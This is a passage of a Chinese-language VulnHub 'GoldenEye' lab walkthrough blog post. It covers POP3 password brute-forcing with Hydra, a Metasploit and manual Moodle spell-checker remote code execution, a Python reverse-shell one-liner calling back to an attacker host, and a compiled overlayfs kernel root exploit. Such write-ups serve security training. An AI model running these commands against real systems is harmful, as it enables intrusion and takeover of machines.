<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">邮件信息：</span><br><span class="line">Greetings Xenia,</span><br><span class="line">As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.</span><br><span class="line">My email username is...</span><br><span class="line">doak</span><br><span class="line">Thank you,</span><br><span class="line">Cheers,</span><br><span class="line">Dr. Doak &quot;The Doctor&quot;</span><br><span class="line">Training Scientist - Sr Level Training Operating Supervisor</span><br><span class="line">GoldenEye Operations Center Sector</span><br><span class="line">Level 14 - NO2 - id:998623-1334</span><br><span class="line">Campus 4, Building 57, Floor -8, Sector 6, cube 1,007</span><br><span class="line">Phone 555-193-826</span><br><span class="line">Cell 555-836-0944</span><br><span class="line">Office 555-846-9811</span><br><span class="line">Personal 555-826-9923</span><br><span class="line">Email: doak@</span><br><span class="line">Please Recycle before you print, Stay Green aka save the company money!</span><br><span class="line">&quot;There&#x27;s such a thing as Good Grief. Just ask Charlie Brown&quot; - someguy</span><br><span class="line">&quot;You miss 100% of the shots you don&#x27;t shoot at&quot; - Wayne G.</span><br><span class="line">THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.</span><br><span class="line"></span><br><span class="line">翻译：</span><br><span class="line">问候 Xenia，</span><br><span class="line">作为我们 GoldenEye 培训的新承包商，我欢迎您。 完成您的帐户后，您的仪表板上将显示更多课程。 如果您有任何问题，请通过电子邮件给我发消息，而不是在这里。</span><br><span class="line">我的邮箱用户名是...</span><br><span class="line">多克</span><br><span class="line">谢谢，</span><br><span class="line">干杯，</span><br><span class="line">多克博士“医生”</span><br><span class="line">培训科学家 - 高级培训运营主管</span><br><span class="line">GoldenEye运营中心部门</span><br><span class="line">14 级 - NO2 - id:998623-1334</span><br><span class="line">Campus 4, Building 57, Floor -8, Sector 1,007</span><br><span class="line">电话 555-193-826</span><br><span class="line">手机 555-836-0944</span><br><span class="line">办公室 555-846-9811</span><br><span class="line">个人 555-826-9923</span><br><span class="line">邮箱：doak@</span><br><span class="line">请在打印前回收利用，保持绿色，也就是节省公司的钱！</span><br><span class="line">“有像 Good Grief 这样的东西。问问 Charlie Brown”——someguy</span><br><span class="line">“你错过了 100% 没有投篮的投篮”——韦恩 G.</span><br><span class="line">这是一条安全消息，除非，否则请勿发送。</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="pop3-gt-爆破用户doak"><a href="#pop3-gt-爆破用户doak" class="headerlink" title="pop3-&gt;爆破用户doak"></a>pop3-&gt;爆破用户doak</h3><p>​	未获取到其他的信息，信息中能获取到的是一个新的用户名<code>doak</code>，只能回到55007端口尝试使用<code>doak</code>进行爆破。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.103:55007</span><br><span class="line"></span><br><span class="line">[55007][pop3] host: 192.168.56.103   login: doak   password: goat</span><br></pre></td></tr></table></figure>

<h4 id="doak账号"><a href="#doak账号" class="headerlink" title="doak账号"></a>doak账号</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.56.103 55007</span><br><span class="line">+OK GoldenEye POP3 Electronic-Mail System</span><br><span class="line">user doak</span><br><span class="line">+OK</span><br><span class="line">pass goat</span><br><span class="line">+OK Logged in.</span><br><span class="line">list</span><br><span class="line">+OK 1 messages:</span><br><span class="line">1 606</span><br><span class="line">.</span><br><span class="line">retr 1</span><br><span class="line">+OK 606 octets</span><br><span class="line">Return-Path: &lt;doak@ubuntu&gt;</span><br><span class="line">X-Original-To: doak</span><br><span class="line">Delivered-To: doak@ubuntu</span><br><span class="line">Received: from doak (localhost [127.0.0.1])</span><br><span class="line">        by ubuntu (Postfix) with SMTP id 97DC24549D</span><br><span class="line">        for &lt;doak&gt;; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)</span><br><span class="line">Message-Id: &lt;20180425034731.97DC24549D@ubuntu&gt;</span><br><span class="line">Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)</span><br><span class="line">From: doak@ubuntu</span><br><span class="line"></span><br><span class="line">James,</span><br><span class="line">If you&#x27;re reading this, congrats you&#x27;ve gotten this far. You know how tradecraft works right?</span><br><span class="line"></span><br><span class="line">Because I don&#x27;t. Go to our training site and login to my account....dig until you can exfiltrate further information......</span><br><span class="line"></span><br><span class="line">username: dr_doak</span><br><span class="line">password: 4England!</span><br><span class="line"></span><br><span class="line">.</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">翻译：</span><br><span class="line">詹姆士，</span><br><span class="line">如果您正在阅读本文，那么恭喜您已经走到了这一步。 你知道tradecraft是如何运作的吗？</span><br><span class="line"></span><br><span class="line">因为我没有。 访问我们的培训网站并登录我的帐户....挖掘直到您可以泄露更多信息......</span><br></pre></td></tr></table></figure>

<p>​	根据提示，使用给定的用户名密码继续访问前面给出的website。</p>
<h3 id="dr-doak登录website"><a href="#dr-doak登录website" class="headerlink" title="dr_doak登录website"></a>dr_doak登录website</h3><p>登录网站后发现右边有一个s3cret.txt文件，点击后下载。</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805104938778.png" alt="image-20220805104938778"></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805105136726.png" alt="image-20220805105136726"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">翻译：</span><br><span class="line">007,</span><br><span class="line"></span><br><span class="line">我能够通过 clear txt 捕获这个应用程序 adm1n cr3ds。</span><br><span class="line"></span><br><span class="line">GoldenEye 服务器中的大多数 Web 应用程序中的文本都会被扫描，因此我无法在此处添加 cr3dentials。</span><br><span class="line"></span><br><span class="line">juicy 的东西在这里：/dir007key/for-007.jpg</span><br><span class="line"></span><br><span class="line">您可能也知道，RCP-90 远胜于任何其他武器，而杀戮许可证是唯一的游戏方式。</span><br></pre></td></tr></table></figure>

<h3 id="for-007-jpg"><a href="#for-007-jpg" class="headerlink" title="for-007.jpg"></a>for-007.jpg</h3><p>得到有效信息，访问该图片。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://severnaya-station.com/dir007key/for-007.jpg</span><br></pre></td></tr></table></figure>

<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805111105157.png" alt="image-20220805111105157"></p>
<p>图片看起来没什么有用信息，下载下来分析。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">wget http://severnaya-station.com/dir007key/for-007.jpg</span><br><span class="line"></span><br><span class="line">strings for-007.jpg </span><br><span class="line">JFIF</span><br><span class="line">Exif</span><br><span class="line">eFdpbnRlcjE5OTV4IQ==</span><br><span class="line">GoldenEye</span><br><span class="line">linux</span><br><span class="line">For James</span><br><span class="line">0231</span><br><span class="line">0100</span><br><span class="line">ASCII</span><br><span class="line">For 007</span><br><span class="line">&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;</span><br><span class="line">             !      !!!   !!!!!!!!&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;</span><br><span class="line">......          </span><br></pre></td></tr></table></figure>



<p>base64解码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo eFdpbnRlcjE5OTV4IQ== | base64 --decode</span><br><span class="line">xWinter1995x!</span><br></pre></td></tr></table></figure>

<!--I was able to capture this apps adm1n cr3ds through clear txt. -->

<p>​	文本中提到他能通过明文获取admin的密码在这个图片里面，得出这里base64解码的结果是应用中admin的密码。</p>
<h1 id="漏洞利用-CVE-2013-3630"><a href="#漏洞利用-CVE-2013-3630" class="headerlink" title="漏洞利用-CVE-2013-3630"></a>漏洞利用-CVE-2013-3630</h1><h2 id="方式一：MSF"><a href="#方式一：MSF" class="headerlink" title="方式一：MSF"></a>方式一：MSF</h2><p>​	识别出cms以及版本后，搜索其版本的漏洞。</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805134339760.png" alt="image-20220805134339760"></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805134546027.png" alt="image-20220805134546027"></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805134618612.png" alt="image-20220805134618612"></p>
<p>​	搜索出来在Metasploit中有exp可以使用,但多次尝试不成功，后了解到exp中需要执行<code>PSpellshell</code></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805141614925.png" alt="image-20220805141614925"></p>
<h3 id="Shell-engine"><a href="#Shell-engine" class="headerlink" title="Shell engine"></a>Shell engine</h3><p>​	在web应用中修改设置：</p>
<p><code>Home - Site administration - Plugins - Text editors - TinyMCE HTML editor - PSpellShell</code></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220805141338249.png" alt="image-20220805141338249"></p>
<h3 id="msfconsole"><a href="#msfconsole" class="headerlink" title="msfconsole"></a>msfconsole</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msfconsole </span><br><span class="line">use exploit/multi/http/moodle_spelling_binary_rce</span><br><span class="line">set username admin</span><br><span class="line">set password xWinter1995x!</span><br><span class="line">set rhost severnaya-station.com</span><br><span class="line">set targeturi /gnocertdir</span><br><span class="line">set payload cmd/unix/reverse</span><br><span class="line">set lhost 10.1.1.184</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>



<h2 id="方式二：手动触发"><a href="#方式二：手动触发" class="headerlink" title="方式二：手动触发"></a>方式二：手动触发</h2><p>​	手动发出同样需要修改Shell engine。</p>
<h3 id="Page-to-aspell"><a href="#Page-to-aspell" class="headerlink" title="Page to aspell"></a>Page to aspell</h3><p><code>Home - Site administration - Server - System paths</code></p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807111832218.png" alt="image-20220807111832218"></p>
<p>​	在此处修改为python反弹shell的代码。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.1.1.184&quot;,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span><br></pre></td></tr></table></figure>

<h3 id="Toggle-spellchecher"><a href="#Toggle-spellchecher" class="headerlink" title="Toggle spellchecher"></a>Toggle spellchecher</h3><p><code>Home - My profile - Blogs - Add a new entry</code></p>
<p>​	点击该按钮触发前面的命令反弹shell。</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807111532617.png" alt="image-20220807111532617"></p>
<h2 id="成功反弹"><a href="#成功反弹" class="headerlink" title="成功反弹"></a>成功反弹</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">id</span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="line">whoami</span><br><span class="line">www-data</span><br><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ </span><br><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ id</span><br><span class="line">id</span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h1><h2 id="查看内核版本"><a href="#查看内核版本" class="headerlink" title="查看内核版本"></a>查看内核版本</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a</span><br><span class="line">uname -a</span><br><span class="line">Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU</span><br></pre></td></tr></table></figure>

<h2 id="搜索内核版本的exp"><a href="#搜索内核版本的exp" class="headerlink" title="搜索内核版本的exp"></a>搜索内核版本的exp</h2><p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807103139012.png" alt="image-20220807103139012"></p>
<h2 id="overlayfs本地权限提升"><a href="#overlayfs本地权限提升" class="headerlink" title="overlayfs本地权限提升"></a>overlayfs本地权限提升</h2><p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807120857287.png" alt="image-20220807120857287"></p>
<p>​	overlayfs文件系统是一种叠合式文件系统，实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。</p>
<p>​	Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞，本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本，目前已经发布攻击代码，建议受影响用户尽快进行升级。</p>
<p>​	此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入，导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时，文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS&#x3D;y和FS_USERNS_MOUNT标志，将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容，从而提升到管理员权限。</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807103241878.png" alt="image-20220807103241878"></p>
<p>​	根据信息，直接把文件放在环境，通过运行gcc编译后的文件即可将权限提升为root。</p>
<h2 id="exploits-37292"><a href="#exploits-37292" class="headerlink" title="exploits-37292"></a>exploits-37292</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ gcc 37292.c -o exp</span><br><span class="line">gcc 37292.c -o exp</span><br><span class="line">The program &#x27;gcc&#x27; is currently not installed. To run &#x27;gcc&#x27; please ask your administrator to install the package &#x27;gcc&#x27;</span><br></pre></td></tr></table></figure>

<p>​	由于gcc没有安装，所以这里使用cc进行编译，另外，由于代码中也使用到了gcc，也需要改为cc。</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807102958848.png" alt="image-20220807102958848"></p>
<p>​	修改好的文件通过msf上传至靶机，然后通过cc进行编译。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292.c -o exp</span><br><span class="line">cc 37292.c -o exp</span><br><span class="line">37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]</span><br><span class="line">&#125;</span><br><span class="line">^</span><br><span class="line">37292.c:106:12: warning: implicit declaration of function &#x27;unshare&#x27; is invalid in C99 [-Wimplicit-function-declaration]</span><br><span class="line">        if(unshare(CLONE_NEWUSER) != 0)</span><br><span class="line">           ^</span><br><span class="line">37292.c:111:17: warning: implicit declaration of function &#x27;clone&#x27; is invalid in C99 [-Wimplicit-function-declaration]</span><br><span class="line">                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);</span><br><span class="line">                ^</span><br><span class="line">37292.c:117:13: warning: implicit declaration of function &#x27;waitpid&#x27; is invalid in C99 [-Wimplicit-function-declaration]</span><br><span class="line">            waitpid(pid, &amp;status, 0);</span><br><span class="line">            ^</span><br><span class="line">37292.c:127:5: warning: implicit declaration of function &#x27;wait&#x27; is invalid in C99 [-Wimplicit-function-declaration]</span><br><span class="line">    wait(NULL);</span><br><span class="line">    ^</span><br><span class="line">5 warnings generated.</span><br><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls</span><br><span class="line">ls</span><br><span class="line">37292.c        config.php        editor_plugin_src.js  includes</span><br><span class="line">changelog.txt  css               exp                   rpc.php</span><br><span class="line">classes        editor_plugin.js  img</span><br><span class="line">&lt;ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp</span><br><span class="line">./exp</span><br><span class="line">spawning threads</span><br><span class="line">mount #1</span><br><span class="line">mount #2</span><br><span class="line">child threads done</span><br><span class="line">/etc/ld.so.preload created</span><br><span class="line">creating shared library</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">id</span></span></span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),33(www-data)</span><br><span class="line"><span class="meta prompt_"># </span></span><br></pre></td></tr></table></figure>

<h2 id="cat-flag"><a href="#cat-flag" class="headerlink" title="cat flag"></a>cat flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"># cd /root</span><br><span class="line">cd /root</span><br><span class="line"># ls</span><br><span class="line">ls</span><br><span class="line"># ls -la</span><br><span class="line">ls -la</span><br><span class="line">total 44</span><br><span class="line">drwx------  3 root root 4096 Apr 29  2018 .</span><br><span class="line">drwxr-xr-x 22 root root 4096 Apr 24  2018 ..</span><br><span class="line">-rw-r--r--  1 root root   19 May  3  2018 .bash_history</span><br><span class="line">-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc</span><br><span class="line">drwx------  2 root root 4096 Apr 28  2018 .cache</span><br><span class="line">-rw-------  1 root root  144 Apr 29  2018 .flag.txt</span><br><span class="line">-rw-r--r--  1 root root  140 Feb 19  2014 .profile</span><br><span class="line">-rw-------  1 root root 1024 Apr 23  2018 .rnd</span><br><span class="line">-rw-------  1 root root 8296 Apr 29  2018 .viminfo</span><br><span class="line"># cat .flag.txt</span><br><span class="line">cat .flag.txt</span><br><span class="line">Alec told me to place the codes here: </span><br><span class="line"></span><br><span class="line">568628e0d993b1973adc718237da6e93</span><br><span class="line"></span><br><span class="line">If you captured this make sure to go here.....</span><br><span class="line">/006-final/xvf7-flag/</span><br><span class="line"></span><br><span class="line"># </span><br></pre></td></tr></table></figure>

<p>进入&#x2F;006-final&#x2F;xvf7-flag&#x2F;</p>
<p><img src="/2022/08/01/vulnhub-goldeneye/image-20220807105030300.png" alt="image-20220807105030300"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">旗帜被捕获</span><br><span class="line">恭喜你*******************************</span><br><span class="line">你抓到密码了！并阻止了亚历克·特雷维良进行他坚不可摧的复仇！！！！</span><br><span class="line">****************************************</span><br></pre></td></tr></table></figure>


        </div>

        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/vulnhub/">#vulnhub</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2022/08/02/vulnhub-lampiao/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">vulnhub-lampiao</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/06/06/target-cfs/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">target-cfs</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span>
              -
            
            2023&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">forg12</a>
        </div>
        
            <script async  src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v6.6.6</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A6%82%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">2.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E9%9D%B6%E6%9C%BAIP"><span class="nav-number">2.1.</span> <span class="nav-text">获取靶机IP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%9C%8D%E5%8A%A1%E6%89%AB%E6%8F%8F"><span class="nav-number">2.2.</span> <span class="nav-text">端口服务扫描</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#80%E7%AB%AF%E5%8F%A3"><span class="nav-number">2.3.</span> <span class="nav-text">80端口</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9B%E5%85%A5-x2F-sev-home%E8%B7%AF%E5%BE%84"><span class="nav-number">2.3.1.</span> <span class="nav-text">进入&#x2F;sev-home路径</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E7%BD%91%E9%A1%B5%E6%BA%90%E7%A0%81"><span class="nav-number">2.3.2.</span> <span class="nav-text">查看网页源码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%93%E5%BC%80terminal-js"><span class="nav-number">2.3.3.</span> <span class="nav-text">打开terminal.js</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#html-decode"><span class="nav-number">2.3.3.1.</span> <span class="nav-text">html-decode</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E4%BF%A1%E6%81%AF"><span class="nav-number">2.3.3.2.</span> <span class="nav-text">获取信息</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AE%A4%E8%AF%81%E9%80%9A%E8%BF%87-x2F-sev-home"><span class="nav-number">2.3.4.</span> <span class="nav-text">认证通过&#x2F;sev-home</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#55006%E4%B8%8E55007%E7%AB%AF%E5%8F%A3"><span class="nav-number">2.4.</span> <span class="nav-text">55006与55007端口</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Hydra%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3pop3%E6%9C%8D%E5%8A%A1"><span class="nav-number">2.4.1.</span> <span class="nav-text">Hydra暴力破解pop3服务</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#boris%E8%B4%A6%E5%8F%B7"><span class="nav-number">2.4.1.1.</span> <span class="nav-text">boris账号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#natalya%E8%B4%A6%E5%8F%B7"><span class="nav-number">2.4.1.2.</span> <span class="nav-text">natalya账号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%87%8D%E8%A6%81%E4%BF%A1%E6%81%AF%E6%8F%90%E5%8F%96"><span class="nav-number">2.4.1.3.</span> <span class="nav-text">重要信息提取</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" 